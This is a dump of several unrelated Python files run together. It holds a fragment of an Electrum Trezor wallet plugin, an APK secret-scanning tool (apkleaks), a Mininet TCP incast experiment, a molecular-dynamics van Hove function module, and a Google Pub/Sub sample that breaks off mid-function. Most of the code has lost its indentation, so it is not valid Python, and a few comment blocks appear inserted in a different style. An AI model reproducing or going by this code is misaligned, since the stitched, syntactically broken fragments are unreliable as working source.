txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
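# --- Illustrative sketch (not part of the original plugin) ---------------------
# Shows how an Electrum keystore derivation plus a (change, index) pair becomes the
# address_n list sent to the device, using the same parse_path helper imported at
# the top of this file. The derivation string below is hypothetical.
def _address_n_sketch():
    derivation = "m/49'/0'/0'"
    change, index = 0, 7
    address_path = "%s/%d/%d" % (derivation, change, index)
    # parse_path returns a list of uint32; hardened components are OR'd with 0x80000000
    return parse_path(address_path)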
|
apkleaks.py
|
#!/usr/bin/env python3
import io
import json
import logging.config
import os
import re
import shutil
import sys
import tempfile
import threading
import filecmp
from contextlib import closing
from distutils.spawn import find_executable
from pathlib import Path
from pipes import quote
from urllib.request import urlopen
from zipfile import ZipFile
from pyaxmlparser import APK
from apkleaks.colors import color as col
from apkleaks.utils import util
class APKLeaks:
def __init__(self, args, filename):
self.apk = None
self.file = "./APKs/"+filename+".apk"
self.package = filename
self.json = args.json
self.disarg = args.args
self.prefix = "result-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
#self.output = self.main_dir+"/results/temp/"+filename+".txt"
#self.fileout = open(self.output, 'w')
self.output = tempfile.mkstemp(suffix=".%s" % ("json" if self.json else "txt"), prefix=self.prefix, dir=os.path.expanduser("~/apkscanner/results/temp/"))[1]
print(self.output)
self.fileout = open(self.output, "w")
self.pattern = os.path.join(str(Path(self.main_dir).parent), "config", "regexes.json") if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else os.path.join(str(Path(self.main_dir).parent), "jadx", "bin", "jadx%s" % (".bat" if os.name == "nt" else "")).replace("\\","/")
self.out_json = {}
self.scanned = False
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
print("dependenciescalled")
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
try:
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(os.path.join(str(Path(self.main_dir).parent), "jadx"))
os.chmod(self.jadx, 33268)
except Exception as error:
print("errorondependencies")
util.writeln(str(error), col.WARNING)
sys.exit()
def integrity(self):
print("integritycalled")
if os.path.exists(self.jadx) is False:
util.writeln("Can't find jadx binary.", col.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
util.write("Do you want to download jadx? (Y/n) ", col.OKBLUE)
try:
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
util.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", col.WARNING)
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting.", col.FAIL))
if choice:
util.writeln("\n** Downloading jadx...\n", col.OKBLUE)
self.dependencies()
else:
sys.exit(util.writeln("\n** Aborted.", col.FAIL))
if os.path.isfile(self.file):
print("pathisfiles")
print(self.file)
try:
print("self apk info")
self.apk = self.apk_info()
except Exception as error:
print("exception on self apk info")
util.writeln(str(error), col.WARNING)
sys.exit()
else:
return self.apk
else:
sys.exit(util.writeln("It's not a valid file!", col.WARNING))
def decompile(self):
util.writeln("** Decompiling APK...", col.OKBLUE)
args = [self.jadx, self.file, "-d", self.tempdir]
try:
args.extend(re.split(r"\s|=", self.disarg))
except Exception:
pass
comm = "%s" % (" ".join(quote(arg) for arg in args))
comm = comm.replace("\'","\"")
os.system(comm)
def extract(self, name, matches):
if len(matches):
stdout = ("[%s]" % (name))
util.writeln("\n" + stdout, col.OKGREEN)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
for secret in matches:
if name == "LinkFinder":
if re.match(r"^.(L[a-z]|application|audio|fonts|image|kotlin|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
secret = secret[len("'"):-len("'")]
stdout = ("- %s" % (secret))
print(stdout)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
self.fileout.write("%s" % ("\n" if self.json is False else ""))
self.out_json["results"].append({"name": name, "matches": matches})
self.scanned = True
def scanning(self):
if self.apk is None:
sys.exit(util.writeln("** Undefined package. Exit!", col.FAIL))
util.writeln("\n** Scanning against '%s'" % (self.apk.package), col.OKBLUE)
self.out_json["package"] = self.apk.package
self.out_json["results"] = []
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for p in pattern:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(p, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
else:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(pattern, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
def cleanup(self):
shutil.rmtree(self.tempdir)
if self.scanned:
self.fileout.write("%s" % (json.dumps(self.out_json, indent=4) if self.json else ""))
self.fileout.close()
fileold = os.path.expanduser("~/apkscanner/results/"+self.package+".txt")
filenew = self.output
if os.path.exists(fileold):
print("Comparing new and old results")
file_1 = open(fileold, 'r')
file_2 = open(filenew, 'r')
print("Comparing files ", " @ " + 'file1.txt', " # " + 'file2.txt', sep='\n')
file_1_line = file_1.readline()
file_2_line = file_2.readline()
# Used as a line counter
line_no = 1
print()
while file_1_line != '' or file_2_line != '':
# Remove trailing whitespace
file_1_line = file_1_line.rstrip()
file_2_line = file_2_line.rstrip()
# Compare the lines from both files
if file_1_line != file_2_line:
print(file_1_line + " is not the same as " + file_2_line)
print("New findings in: " + self.file)
os.remove(fileold)
shutil.move(filenew, fileold)
break
# Read the next line from the file
file_1_line = file_1.readline()
file_2_line = file_2.readline()
line_no += 1
else:
os.remove(filenew)
file_1.close()
file_2.close()
else:
print("first time scanned, saving results")
shutil.move(filenew, fileold)
print("%s\n** Results saved into '%s%s%s%s'%s." % (col.HEADER, col.ENDC, col.OKGREEN, fileold, col.HEADER, col.ENDC))
else:
self.fileout.close()
os.remove(self.output)
util.writeln("\n** Done with nothing. ¯\\_(ツ)_/¯", col.WARNING)
|
incast.py
|
#!/usr/bin/python
import sys
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.log import lg
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.link import TCIntf
from mininet.util import irange, custom, quietRun, dumpNetConnections
from mininet.cli import CLI
from mininet.log import setLogLevel, info, warn, error, debug
from time import sleep, time
import multiprocessing
from subprocess import Popen, PIPE
import re
import termcolor as T
import argparse
from random import choice, shuffle,randint,randrange,uniform
import random
import os
from util.monitor import monitor_cpu, monitor_qlen, monitor_devs_ng
parser = argparse.ArgumentParser(description="DCTCP tester (Star topology)")
parser.add_argument('--bw', '-B',
dest="bw",
action="store",
help="Bandwidth of links",
required=True)
parser.add_argument('--dir', '-d',
dest="dir",
action="store",
help="Directory to store outputs",
required=True)
parser.add_argument('-n',
dest="n",
action="store",
help="Number of nodes in star. Must be >= 3",
required=True)
parser.add_argument('-t',
dest="t",
action="store",
help="Seconds to run the experiment",
default=30)
parser.add_argument('-u', '--udp',
dest="udp",
action="store_true",
help="Run UDP test",
default=False)
parser.add_argument('--use-hfsc',
dest="use_hfsc",
action="store_true",
help="Use HFSC qdisc",
default=False)
parser.add_argument('--maxq',
dest="maxq",
action="store",
help="Max buffer size of each interface",
default=425)
parser.add_argument('--speedup-bw',
dest="speedup_bw",
action="store",
help="Speedup bw for switch interfaces",
default=-1)
parser.add_argument('--dctcp',
dest="dctcp",
action="store_true",
help="Enable DCTCP (net.ipv4.tcp_dctcp_enable)",
default=False)
parser.add_argument('--mptcp',
dest="mptcp",
action="store_true",
help="Enable MPTCP ",
default=False)
parser.add_argument('--mdtcp',
dest="mdtcp",
action="store_true",
help="Enable MDTCP ",
default=False)
parser.add_argument('--ecn',
dest="ecn",
action="store_true",
help="Enable ECN (net.ipv4.tcp_ecn)",
default=False)
parser.add_argument('--use-bridge',
dest="use_bridge",
action="store_true",
help="Use Linux Bridge as switch",
default=False)
parser.add_argument('--tcpdump',
dest="tcpdump",
action="store_true",
help="Run tcpdump on host interfaces",
default=False)
parser.add_argument('--tcp_reddctcp',
dest="tcp_reddctcp",
action="store_true",
help="test tcp with red config as DCTCP",
default=False)
parser.add_argument('--qmaxhost',
dest="qmaxhost",
type=int,
help="maximum host interace queue limit",
default=200)
parser.add_argument('--fct',
dest="fct",
type=int,
help="flow completion test ",
default=0)
parser.add_argument('--delay',dest="delay",default="0.075ms 0.05ms distribution normal ")
args = parser.parse_args()
args.n = int(args.n)
args.bw = float(args.bw)
if args.speedup_bw == -1:
args.speedup_bw = args.bw
args.n = max(args.n, 2)
if not os.path.exists(args.dir):
os.makedirs(args.dir)
if args.use_bridge:
from mininet.node import Bridge as Switch
else:
from mininet.node import OVSKernelSwitch as Switch
lg.setLogLevel('output')
class StarTopo(Topo):
def __init__(self, n=3, bw=100):
# Add default members to class.
super(StarTopo, self ).__init__()
# Host and link configuration
hconfig = {'cpu': 0.1}
ldelay_config = {'bw': 1000, 'delay': args.delay,'max_queue_size': args.qmaxhost}
if args.dctcp or args.mdtcp or args.tcp_reddctcp :
lconfig = {'bw': bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_ecn': True,
'red_burst': 30,
'red_limit':100000,
'red_min':30000,
'red_max':31000,
'red_avpkt':1000,
'red_prob':1.0,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
elif args.ecn :
lconfig = {'bw':bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_ecn': True,
'red_burst': 53,
'red_limit':120000,
'red_min':30000,
'red_max':100000,
'red_prob':0.01,
'red_avpkt':1000,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
else:
lconfig = {'bw': bw,
'delay': 0,
'max_queue_size': int(args.maxq),
'enable_red': True,
'red_burst': 53,
'red_limit':120000,
'red_min':30000,
'red_max':100000,
'red_prob':0.01,
'red_avpkt':1000,
'use_hfsc': args.use_hfsc,
'speedup': float(args.speedup_bw)
}
print '~~~~~~~~~~~~~~~~~> BW = %s' % bw
# Create switch and host nodes
for i in xrange(n):
self.addHost('h%d' % (i+1), **hconfig)
self.addSwitch('s1')
# add link between receiver and switch (switch interface will be s1-eth1)
self.addLink('s1', 'h1',intf=TCIntf,params1=lconfig, params2=lconfig)
#self.addLink('h1', 's1', **lconfig)
for i in xrange(1, n):
if args.mptcp or args.mdtcp:
for k in range (4):
self.addLink('h%d' % (i+1), 's1',intf=TCIntf,params1=ldelay_config, params2=ldelay_config)
self.addLink('h%d' % (i+1), 's1',intf=TCIntf,params1=ldelay_config, params2=ldelay_config)
# self.addLink('h%d' % (i+1), 's1', **ldelay_config)
def waitListening(client, server, port):
"Wait until server is listening on port"
if 'telnet' not in client.cmd('which telnet'):
raise Exception('Could not find telnet')
cmd = ('sh -c "echo A | telnet -e A %s %s"' %
(server.IP(), port))
# print(client.cmd(cmd))
while 'Connected' not in client.cmd(cmd):
print('waiting for', server,
'to listen on port', port, '\n')
sleep(.5)
def progress(t):
while t > 0:
print T.colored(' %3d seconds left \r' % (t), 'cyan'),
t -= 1
sys.stdout.flush()
sleep(1)
print '\r\n'
def enable_tcp_ecn():
Popen("sysctl -w net.ipv4.tcp_ecn=1", shell=True).wait()
Popen("sudo sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
Popen("sysctl -w net.ipv4.tcp_congestion_control=reno", shell=True).wait()
def disable_tcp_ecn():
os.system("sysctl -w net.ipv4.tcp_ecn=0")
os.system("sysctl -w net.mptcp.mptcp_enabled=0")
def enableMPTCP(subflows):
Popen("sysctl -w net.ipv4.tcp_ecn=0",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_enabled=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_debug=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_path_manager=ndiffports",shell=True).wait
Popen("echo -n %i > /sys/module/mptcp_ndiffports/parameters/num_subflows" % int(subflows),shell=True).wait()
# os.system("sudo sysctl -w net.mptcp.mptcp_path_manager=fullmesh")
Popen("sysctl -w net.ipv4.tcp_congestion_control=olia",shell=True).wait()
def enableMDTCP(subflows):
Popen("sysctl -w net.ipv4.tcp_ecn=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_enabled=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_debug=1",shell=True).wait()
Popen("sysctl -w net.mptcp.mptcp_path_manager=ndiffports",shell=True).wait()
Popen("echo -n %i > /sys/module/mptcp_ndiffports/parameters/num_subflows" % int(subflows),shell=True).wait()
# os.system("sudo sysctl -w net.mptcp.mptcp_path_manager=fullmesh")
Popen("sysctl -w net.ipv4.tcp_congestion_control=mdtcp",shell=True).wait()
def enable_dctcp():
# enable_tcp_ecn()
# Popen("sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
os.system("sysctl -w net.ipv4.tcp_ecn=1")
os.system("sysctl -w net.ipv4.tcp_congestion_control=dctcp")
# Popen("echo dctcp > /proc/sys/net/ipv4/tcp_congestion_control",shell=True).wait()
# Popen("echo 1 > /proc/sys/net/ipv4/tcp_ecn",shell=True).wait()
def disable_dctcp():
disable_tcp_ecn()
# Popen("sysctl -w net.ipv4.tcp_congestion_control=reno", shell=True).wait()
# Popen("sysctl -w net.mptcp.mptcp_enabled=0",shell=True).wait()
def main():
seconds = int(args.t)
setLogLevel('output')
# Reset to known state
# disable_dctcp()
disable_tcp_ecn()
sleep(2)
# enable_dctcp()
cong_ctrl="reno"
if args.ecn:
enable_tcp_ecn()
cong_ctrl="reno"
elif args.dctcp:
# enable_tcp_ecn()
enable_dctcp()
cong_ctrl="dctcp"
elif args.tcp_reddctcp:
enable_tcp_ecn()
cong_ctrl="reno"
elif args.mptcp:
enableMPTCP(4)
cong_ctrl="olia"
elif args.mdtcp:
enableMDTCP(4)
cong_ctrl="mdtcp"
else:
os.system("sysctl -w net.ipv4.tcp_congestion_control=reno")
topo = StarTopo(n=args.n, bw=args.bw)
net = Mininet(topo=topo, host=CPULimitedHost,switch=Switch,
autoStaticArp=True)
net.start()
nodes = net.hosts + net.switches
for node in nodes:
node.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
node.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
node.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
for port in node.ports:
if str.format('{}', port) != 'lo':
#node.cmd(str.format('ethtool --offload {} tx off rx off gro off tso off', port))
node.cmd(str.format('ethtool -K {} gso off tso off gro off tx off rx off', port))
s1= net.getNodeByName('s1')
for port in s1.ports:
if str.format('{}', port) == 's1-eth1':
# s1-eth1 is the bottleneck interface, so configure its queue on the switch directly
s1.cmd(str.format('tc qdisc del dev {} root', port))
if args.mdtcp or args.dctcp or args.tcp_reddctcp:
s1.cmd(str.format('sudo ip link set txqueuelen {} dev {}', args.maxq, port))
s1.cmd(str.format('tc qdisc replace dev {} root handle 5:0 htb default 1', port))
s1.cmd(str.format('tc class replace dev {} parent 5:0 classid 5:1 htb rate {}Mbit ceil {}Mbit burst 1516', port, args.bw, args.bw))
s1.cmd(str.format('tc qdisc replace dev {} parent 5:1 handle 10: red limit 100000 min 30000 max 31000 avpkt 1000 burst 30 ecn bandwidth {} probability 1.0 ', port, args.bw))
else:
s1.cmd(str.format('sudo ip link set txqueuelen {} dev {}', args.maxq, port))
s1.cmd(str.format('tc qdisc replace dev {} root handle 5:0 htb default 1', port))
s1.cmd(str.format('tc class replace dev {} parent 5:0 classid 5:1 htb rate {}Mbit ceil {}Mbit burst 1516', port, args.bw, args.bw))
s1.cmd(str.format('tc qdisc replace dev {} parent 5:1 handle 10: red limit 120000 min 30000 max 100000 avpkt 1000 burst 53 bandwidth {} probability 0.01', port, args.bw))
#node.cmd(str.format('tc qdisc replace dev {} parent 10:1 handle 20: netem delay {} limit {} ', port,args.delay, args.maxq))
# CLI(net)
for i in xrange(1,args.n):
h=net.getNodeByName('h%d'%(i+1))
cmd="./tcp_server/tcp_server >> test_log &"
h.cmd(cmd,shell=True)
print(h.IP())
sleep(2)
h1 = net.getNodeByName('h1')
#clients = [net.getNodeByName('h%d' % (i+1)) for i in xrange(1, args.n)]
#waitListening(clients[0], h1, 5001)
monitors = []
# monitor = multiprocessing.Process(target=monitor_cpu, args=('%s/cpu.txt' % args.dir,))
# monitor.start()
# monitors.append(monitor)
monitor = multiprocessing.Process(target=monitor_qlen, args=('s1-eth1', 0.01, '%s/qlen_s1-eth1.txt' % (args.dir)))
monitor.start()
monitors.append(monitor)
# sleep(2)
# monitor = multiprocessing.Process(target=monitor_devs_ng, args=('%s/txrate.txt' % args.dir, 0.01))
# monitor.start()
# monitors.append(monitor)
Popen("rmmod tcp_probe; modprobe tcp_probe port=5001; cat /proc/net/tcpprobe > %s/tcp_probe.txt" % args.dir, shell=True)
Popen("tcpdump -i s1-eth1 -w %s/log.pcap -s 96 & " % args.dir, shell=True)
for i in xrange(args.n-1,args.n):
print ("./tcp_client conf/"+str(i)+"servers.conf t.csv")
clnt_cmd="./tcp_client/tcp_client tcp_client/conf/"+str(i)+"servers.conf "+args.dir+"/fct_fanout"+str(i)+".csv"
h1.cmd(clnt_cmd,shell=True)
print("after Client")
wtime=seconds
sleep(wtime)
# progress(10)
for monitor in monitors:
monitor.terminate()
# for h in net.hosts:
# h.cmd("netstat -s > %s/nstat_%s.txt" % (args.dir,h.IP()), shell=True)
net.stop()
# disable_dctcp()
disable_tcp_ecn()
Popen("killall -9 cat ping top iperf bwm-ng tcpprobe ", shell=True).wait()
if __name__ == '__main__':
main()
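# Hedged usage note (not part of the original script): the experiment is
# typically launched from the command line with the argparse flags defined
# above; the exact values below are illustrative assumptions, e.g.
#   sudo python incast.py --bw 100 -n 10 --dir results/reno -t 30
#   sudo python incast.py --bw 100 -n 10 --dir results/dctcp --dctcp -t 30
#   sudo python incast.py --bw 100 -n 10 --dir results/mdtcp --mdtcp -t 30
# Root privileges are needed because the script changes sysctls and builds a
# Mininet topology.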
|
van_hove.py
|
import multiprocessing
import sys
import itertools as it
import numpy as np
import mdtraj as md
from progressbar import ProgressBar
from scattering.utils.utils import get_dt
from scattering.utils.constants import get_form_factor
def compute_van_hove(trj, chunk_length, water=False,
r_range=(0, 1.0), bin_width=0.005, n_bins=None,
self_correlation=True, periodic=True, opt=True, partial=False):
"""Compute the partial van Hove function of a trajectory
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
water : bool
use X-ray form factors for water that account for polarization
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
t : numpy.ndarray
time values corresponding to the frames within a chunk
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
n_physical_atoms = len([a for a in trj.top.atoms if a.element.mass > 0])
unique_elements = list(set([a.element for a in trj.top.atoms if a.element.mass > 0]))
data = []
for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
data.append([
trj,
chunk_length,
'element {}'.format(elem1.symbol),
'element {}'.format(elem2.symbol),
r_range,
bin_width,
n_bins,
self_correlation,
periodic,
opt,
])
manager = multiprocessing.Manager()
partial_dict = manager.dict()
jobs = []
version_info = sys.version_info
for d in data:
with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:
if version_info.major == 3 and version_info.minor <= 7:
p = pool.Process(target=worker, args=(partial_dict, d))
elif version_info.major == 3 and version_info.minor >= 8:
ctx = multiprocessing.get_context()
p = pool.Process(ctx, target=worker, args=(partial_dict, d))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
r = partial_dict['r']
del partial_dict['r']
if partial:
return partial_dict
norm = 0
g_r_t = None
for key, val in partial_dict.items():
elem1, elem2 = key
concentration1 = trj.atom_slice(trj.top.select(elem1)).n_atoms / n_physical_atoms
concentration2 = trj.atom_slice(trj.top.select(elem2)).n_atoms / n_physical_atoms
form_factor1 = get_form_factor(element_name=elem1.split()[1], water=water)
form_factor2 = get_form_factor(element_name=elem2.split()[1], water=water)
coeff = form_factor1 * concentration1 * form_factor2 * concentration2
if g_r_t is None:
g_r_t = np.zeros_like(val)
g_r_t += val * coeff
norm += coeff
# Reshape g_r_t to better represent the discretization in both r and t
g_r_t_final = np.empty(shape=(chunk_length, len(r)))
for i in range(chunk_length):
g_r_t_final[i, :] = np.mean(g_r_t[i::chunk_length], axis=0)
g_r_t_final /= norm
t = trj.time[:chunk_length]
return r, t, g_r_t_final
def worker(return_dict, data):
key = (data[2], data[3])
r, g_r_t_partial = compute_partial_van_hove(*data)
return_dict[key] = g_r_t_partial
return_dict['r'] = r
def compute_partial_van_hove(trj, chunk_length=10, selection1=None, selection2=None,
r_range=(0, 1.0), bin_width=0.005, n_bins=200,
self_correlation=True, periodic=True, opt=True):
"""Compute the partial van Hove function of a trajectory
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
selection1 : str
selection to be considered, in the style of MDTraj atom selection
selection2 : str
selection to be considered, in the style of MDTraj atom selection
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
unique_elements = (
set([a.element for a in trj.atom_slice(trj.top.select(selection1)).top.atoms]),
set([a.element for a in trj.atom_slice(trj.top.select(selection2)).top.atoms]),
)
if any([len(val) > 1 for val in unique_elements]):
raise UserWarning(
'Multiple elements found in one or more selections. Results may not be '
'directly comparable to scattering experiments.'
)
# Don't need to store it, but this serves to check that dt is constant
dt = get_dt(trj)
pairs = trj.top.select_pairs(selection1=selection1, selection2=selection2)
n_chunks = int(trj.n_frames / chunk_length)
g_r_t = None
pbar = ProgressBar()
for i in pbar(range(n_chunks)):
times = list()
for j in range(chunk_length):
times.append([chunk_length*i, chunk_length*i+j])
r, g_r_t_frame = md.compute_rdf_t(
traj=trj,
pairs=pairs,
times=times,
r_range=r_range,
bin_width=bin_width,
n_bins=n_bins,
period_length=chunk_length,
self_correlation=self_correlation,
periodic=periodic,
opt=opt,
)
if g_r_t is None:
g_r_t = np.zeros_like(g_r_t_frame)
g_r_t += g_r_t_frame
return r, g_r_t
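# Hedged usage sketch (not part of the module): how compute_van_hove might be
# called on an MDTraj trajectory. The trajectory/topology file names and the
# chunk_length value are illustrative assumptions.
if __name__ == '__main__':
    example_trj = md.load('traj.xtc', top='top.pdb')
    r, t, g_r_t = compute_van_hove(example_trj, chunk_length=200, water=False)
    print(r.shape, t.shape, g_r_t.shape)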
|
subscriber.py
|
#!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_name):
"""Lists all subscriptions for a given topic."""
# [START pubsub_list_topic_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_name)
for subscription in publisher.list_topic_subscriptions(topic_path):
print(subscription)
# [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
# [START pubsub_list_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
for subscription in subscriber.list_subscriptions(project_path):
print(subscription.name)
# [END pubsub_list_subscriptions]
def create_subscription(project_id, topic_name, subscription_name):
"""Create a new pull subscription on the given topic."""
# [START pubsub_create_pull_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscription = subscriber.create_subscription(
subscription_path, topic_path)
print('Subscription created: {}'.format(subscription))
# [END pubsub_create_pull_subscription]
def create_push_subscription(project_id,
topic_name,
subscription_name,
endpoint):
"""Create a new push subscription on the given topic."""
# [START pubsub_create_push_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = subscriber.create_subscription(
subscription_path, topic_path, push_config)
print('Push subscription created: {}'.format(subscription))
print('Endpoint for subscription is: {}'.format(endpoint))
# [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_name):
"""Deletes an existing Pub/Sub topic."""
# [START pubsub_delete_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscriber.delete_subscription(subscription_path)
print('Subscription deleted: {}'.format(subscription_path))
# [END pubsub_delete_subscription]
def update_subscription(project_id, subscription_name, endpoint):
"""
Updates an existing Pub/Sub subscription's push endpoint URL.
Note that certain properties of a subscription, such as
its topic, are not modifiable.
"""
# [START pubsub_update_push_configuration]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = pubsub_v1.types.Subscription(
name=subscription_path,
push_config=push_config)
update_mask = {
'paths': {
'push_config',
}
}
subscriber.update_subscription(subscription, update_mask)
result = subscriber.get_subscription(subscription_path)
print('Subscription updated: {}'.format(subscription_path))
print('New endpoint for subscription is: {}'.format(
result.push_config))
# [END pubsub_update_push_configuration]
def receive_messages(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull]
# [START pubsub_quickstart_subscriber]
import time
